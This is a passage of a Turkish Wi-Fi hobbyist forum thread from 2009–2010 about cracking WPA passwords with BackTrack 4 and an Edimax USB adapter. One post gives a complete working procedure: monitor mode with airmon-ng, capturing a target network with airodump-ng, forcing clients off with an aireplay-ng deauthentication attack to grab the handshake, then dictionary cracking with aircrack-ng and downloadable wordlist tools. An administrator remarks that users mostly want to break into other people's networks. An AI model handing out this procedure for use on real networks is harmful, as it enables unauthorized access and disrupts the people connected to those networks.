WiFi-Turk.com

Kategori durumunu değiştir Canlı (wt.liveticker)

1
1
1
1
1
(06 Aralık 2016) rk41, üye haritasına ekleme yapti.
100
1
1
1
1
1
1
1
1
(26 Ağustos 2016) xecron, Linksys WRT54G V4.0 (WRT54GL) USB Modifikasyonu (USB Modification) içeriğine yorum ekledi.
2

Resim
* * * * * 1 Oy Kullanılmış

Bt4 Ve Edimax 7318Usg Ile Wpa Penetrasyon Testi

Konu 90 günden eski olduğu için geçerliliğini yitirmiş olabilir!

• Please log in to reply
Bu konuya 30 yanıt gönderildi

#11 Gökhan

Gökhan

captain

• Yönetici
  • 5,175 İleti
  • Nereden: Yurt Dışı
  • İlgi alanı: Wi-Fi bağımlısı

Yazma tarihi: 16 December 2009 - 06:53 PM

wordlist programı olan varmı

Sitede daha önce bazi arkadaslar sagolsun wordlist paylasmislardi, forum aramasina wordlist filan yazarsan, birsey bulman gerekiyor.
  • 0

Şimdiden bir yılın planlarını yapıyorsan, pirinç yetiştir.

Şimdiden on yılın planlarıını yapıyorsan, ağaç yetiştir.

Şimdiden asrın planlarını yapıyorsan, insan yetiştir.
Tschuang-Tse (Çinli Filozof)

#12 konkordato

konkordato

Aramıza hoşgeldin

• Aramıza hoşgeldin
  • 15 İleti
  • Nereden: Adana

Yazma tarihi: 17 December 2009 - 12:41 AM

Japon arkadaslarimiz Ohigashi ve Mori, Tews ve Beck'in man in the middle ataklari ile wpa sistemi üzerinde calisma yapiyorlardi. Suanda durum nedir bilmiyorum.

Bu japonlardan korkmaya başladım,japonlar yaparsa olur :)
  • 0

#13 msenoz

msenoz

V.I.P.

• V.I.P.
  • 686 İleti
  • Nereden: Bursa
  • İlgi alanı: Belirsiz

Yazma tarihi: 17 December 2009 - 02:29 PM

Japonların ve onun öncesinde yapılan atak ile ilgili detaylar WPA/WPA2 TKIP attack burada var,
merak eden arkadaşlar inceleyebilir.

Konu msenoz tarafından 17 December 2009 - 02:33 PM tarih ve saatinde düzenlenmiştir

• 0

#14 DjKarakurt

DjKarakurt

Katılımcı Üye

• Katılımcı Üye
  • 176 İleti
  • Nereden: Elazığ

Yazma tarihi: 18 December 2009 - 12:01 PM

Paylaşım ve bilgilendirmeleriniz için teşekkürler
  • 0

#15 ShiftDelete

ShiftDelete

Aramıza hoşgeldin

• Aramıza hoşgeldin
  • 6 İleti
  • Nereden: Iğdır

Yazma tarihi: 20 July 2010 - 01:56 PM

Vereceğim Kodlar BT4 de denenmiştir. Cihazım yeni model EDIMAX EW-7318USG

İşi sağlama almak için Sanal makine kullanmayıp BT4 dvd ile boot ettim..
USB cihazınızı tanıdığı takdirde bu kodları Sanal makinede de kullanabilirsiniz..
WPA crack için toplam 2 adet konsol penceresi açmamız yeterli.
ADIM-1 (.cap dosyası alma)

KONSOL-1 Gerekli bilgileri toplama

iwconfig (interface öğren örneğin; eth0, wlan0,rausb0.... gibi ***benimki wlan0 olduğundan bundan sonra böyle devam edeceğim.)
ifconfig wlan0 (kendi MAC adresini öğren)
airmon-ng start wlan0 (burada dinleme moduna geçiyoruz)
airodump-ng wlan0 (şifreleme türü WPA olan bir modem seç, BSSID,Kanal No'su ve modeme bağlı olan Client'in MAC adresini (Client_MAC)kaydet) Ctrl+Z ile durdurup kod yazmaya devam edebilirsiniz...
airodump-ng -c <kanalno> --bssid <bssid> -w <dosya_adı> wlan0 (burada paket toplamaya başladık)
KONSOL-2 Handshake yakalama...

aireplay-ng -0 5 -a <bssid> -c <ClientMAC> wlan0 (Bundan sonra handshake bekliyoruz.Şayet handshake yakalarsak Konsol-1'in üst tarafında resimdeki gibi yazar )

Resmi ekleyen

ADIM-2 (Şifre kırma)

BT4'ün masaüstünden .cap dosyasını alıp windows ortamında kıralım. Windows ortamında kırmamın sebebi çoğu kullanıcının dosya yolunu yazamıyor olması. ve hata alması.

.cap dosyasını herhangibir taşınabilir medya ile windows ortamına alıp ekte verdiğim dosya içerisinde ki aircrack-ng GUI ile kıracağız.

Dosya yolu: WPA\aircrack-ng-1.0-win\aircrack-ng-1.0-win\bin\Aircrack-ng GUI.exe

Resmi ekleyen

Gerekli dosyaları BU adresten bulabilirsiniz.

Dosya içerisinde wifi-turk.com konularından derlediğim Wordlist oluşturabileceğiniz 2 adet program da ekledim. Programları sunan arkadaşlara teşekkür ederim.

Bundan sonrası wordlistlerinizin çeşitliliğine bağlı..

Kolay gelsin..

Saygılar..

Engin TÜRKER

Forumda şifre krmayla alakalı herkes birşeyler paylaşıyor ama bir allahın kuluda
kendi yaptığı şeyi paylaşamıyor.Çünkü yabancı sitelerden kopyala yapıştır...
Arkadaşlar şuana kadar wpa şifresi kıran oldumu sitede lütfen söyleyin.Bu şekilde
forumda herkes bişey söylüyor ama ortada bir şey yok malesef...

Ayrıca zaten wordlist düzenlemeyle bu işler çokkk zor..Harf tuş kombinasyonu felan zor iş..
Haaa bir Allahın kulu çıkar ben program yazdım Tüm harflerle rakamların kombinasyonunu yapabiliyor derse
o zaman başka..Kaldı ki böyle olsa bile işaretleri yapamazsınız ( ? , _ ,! , vb..)..

Olmaz ya hadi diyelim basit sadece harflerden oluşan bir liste bulalım bu seferde Büyük-Küçük harf uygun olmadığı takdirde yine
hiçbir sonuç vermiyecek..Örnek olması açısından şifremiz "EvdeŞenliKBitti" olsun peki wordlistimizde ev-şenlik ve bitti kelimeleri kayıtlı
peki bu kelimeleri yanya getirecek ve büyük küçük harfleride uygun şekilde yazabilecek bir wordlist lazım ki buda İmkansız!!!!!!

Yani kısacası bu iş öyle sandınız kadar kolya değil.Hele Wordlist le olacak kadar hiç değil...

Konu ShiftDelete tarafından 20 July 2010 - 02:12 PM tarih ve saatinde düzenlenmiştir

• 0

#16 Gökhan

Gökhan

captain

• Yönetici
  • 5,175 İleti

Yazma tarihi: 20 July 2010 - 02:12 PM

Forumda şifre krmayla alakalı herkes birşeyler paylaşıyor ama bir allahın kuluda
Arkadaşlar şuana kadar wpa şifresi kıran oldumu sitede lütfen söyleyin.Bu şekilde
Ayrıca zaten wordlist düzenlemeyle bu işler çokkk zor..Harf tuş kombinasyonu felan zor iş..
Haaa bir Allahın kulu çıkar ben program yazdım Tüm harflerle rakamların kombinasyonunu yapabiliyor derse
o zaman başka..Kaldı ki böyle olsa bile işaretleri yapamazsınız ( ? , _ ,! , vb..)..

Yani kısacası bu iş öyle sandınız kadar kolya değil.Hele Wordlist le olacak kadar hiç değil...

Her konuda, cogunlukla her alanda insanlar disardan ilham alir, kaynak disardan gelir. fikirler disardan gelir. Bu durumda da bir makaleyi yabanci bir siteden alip koymak anormal bir durum degil. Sonucta acigi bulanlarda onlar ;)

WPA kirmaya gelecek olursak, wpa kirabilmek icin bazi yollar var, ama wep kadar kolay degil. Eger sansliysan wpa'da kirabilirsin.
Ha yabancilarla bizler arasindaki bir farkinida söyleyeyim. Yabanci genellikle kendi ag üzerinde, sirf arastirma olsun diye ataklar yapip sifreyi kirmaya calisiyor.

Bizde daha cok baskasinin agi sömürülmek isteniyor, sartlar uygun olmadigi icin sifre kirilamiyor ondan sonra hayal kirikligina ugruyorlar.
  • 0

Şimdiden bir yılın planlarını yapıyorsan, pirinç yetiştir.

Şimdiden on yılın planlarıını yapıyorsan, ağaç yetiştir.

Şimdiden asrın planlarını yapıyorsan, insan yetiştir.
Tschuang-Tse (Çinli Filozof)

#17 ShiftDelete

ShiftDelete

Aramıza hoşgeldin

• Aramıza hoşgeldin
  • 6 İleti
  • Nereden: Iğdır

Yazma tarihi: 20 July 2010 - 02:32 PM

Her konuda, cogunlukla her alanda insanlar disardan ilham alir, kaynak disardan gelir. fikirler disardan gelir. Bu durumda da bir makaleyi yabanci bir siteden alip koymak anormal bir durum degil. Sonucta acigi bulanlarda onlar ;)

WPA kirmaya gelecek olursak, wpa kirabilmek icin bazi yollar var, ama wep kadar kolay degil. Eger sansliysan wpa'da kirabilirsin.
Ha yabancilarla bizler arasindaki bir farkinida söyleyeyim. Yabanci genellikle kendi ag üzerinde, sirf arastirma olsun diye ataklar yapip sifreyi kirmaya calisiyor.

Bizde daha cok baskasinin agi sömürülmek isteniyor, sartlar uygun olmadigi icin sifre kirilamiyor ondan sonra hayal kirikligina ugruyorlar.

TDK sözlüğünde yer alan il - isim vb.. kelimelerden şifre yapan varsa kendine haa onları kırabiliyordur belki..
Foruma yeni üye oldum Foruımdaki test edilen cihaz videolarını , yapılan Dbi antenleri ve yazıları dikkatle takip ediyorum..
Umarım güzel paylaşımlar ve yazılar olur..
  • 0

#18 engnturker

engnturker

V.I.P.

• V.I.P.
  • 135 İleti
  • İlgi alanı: Güvenlik

Yazma tarihi: 21 July 2010 - 08:27 AM

Olmaz ya hadi diyelim basit sadece harflerden oluşan bir liste bulalım bu seferde Büyük-Küçük harf uygun olmadığı takdirde yine
hiçbir sonuç vermiyecek..Örnek olması açısından şifremiz "EvdeŞenliKBitti" olsun peki wordlistimizde ev-şenlik ve bitti kelimeleri kayıtlı
peki bu kelimeleri yanya getirecek ve büyük küçük harfleride uygun şekilde yazabilecek bir wordlist lazım ki buda İmkansız!!!!!!

arkadaşım öncelikle foruma hoş geldin. yukarıda benim mesajımdan alıntı yapıp dışarıdan alınmış diyorsun.
öncelikle belirteyim hiç bir resim dışarıdan alınmış değildir, tümü şahsım tarafından upload edilmiştir. haa diyorsun ki bu böyle wordlistle olmaz, bilen birileri başka bir yol bulsun. bu dediğini tüm dünya en az senin kadar istiyor. insanlar wordlistleri biraz daha hızlı deneyebilmek için ekran kartlarıını değiştiriyor. kaldı ki senin istediğin bir wordliste ne pc dayanır ne de harddisk. elde olan kaynak sıkıntısı ile ancak bu kadar oluyor. bu arada " çok kolay kırıldığından artık WEP şifreleme bile tarihe karışıyor. " unutma ki şifreleme algoritmaları kırılsın diye değil, kırılmasın diye yazılır.

Saygılar
Engin TÜRKER
  • 0

Başkalarının bilgisiyle bilgin olsak bile, ancak kendi aklımızla akıllı olabiliriz..!

65:6e:67:6e:74:75:72:6b:65:72

#19 SaW

SaW

Katılımcı Üye

• Katılımcı Üye
  • 42 İleti
  • Nereden: İstanbul
  • İlgi alanı: Belirsiz

Yazma tarihi: 29 September 2010 - 01:36 PM

İntel Wireless WiFi Link 4965AGN

Kart ile , WPA şifre kırma denemesi Yapılabilir mi?
  • 0

#20 Abdus

Abdus

crew | jigsaw

• Yönetici
  • 1,115 İleti
  • Nereden: Kayseri
  • İlgi alanı: Modifikasyonlar

Yazma tarihi: 29 September 2010 - 09:56 PM

İntel Wireless WiFi Link 4965AGN

Kart ile , WPA şifre kırma denemesi Yapılabilir mi?

Merhabalar
Forumda ara tuşunu kullansaydınız keşke.Buraya ve buraya göz atın.
Kolay gelsin.
  • 0